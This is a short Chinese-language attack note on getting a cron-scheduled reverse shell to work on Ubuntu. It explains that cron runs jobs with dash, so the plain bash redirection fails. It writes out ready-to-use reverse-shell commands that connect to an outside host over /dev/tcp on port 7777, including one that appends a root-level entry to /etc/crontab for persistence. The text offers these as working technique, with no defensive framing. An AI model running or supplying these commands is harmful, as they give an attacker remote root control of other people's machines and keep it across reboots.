在ubuntu环境下做攻击时,会遇到下列情况,使用crontab -e写入如下命令反弹,会失败
* * * * * bash -i >& /dev/tcp/192.168.20.200/7777 0>&1
如果要直接写/etc/crontab,这是个系统级别的,要指定用户
echo "* * * * * root bash -c \"bash -i >& /dev/tcp/10.211.55.5/7777 0>&1\"" >> /etc/crontab
原因是在ubuntu下crontab启动默认使用dash来启动,而在dash启动会失败,我们可以来尝试一下。使用dash启动,会直接报如下错误
ubuntu反弹SHELL正确用法是
* * * * * bash -c "bash -i >& /dev/tcp/ip/port 0>&1"
在问题定位过程中,我们可以使用
service cron status
来定位crontab执行问题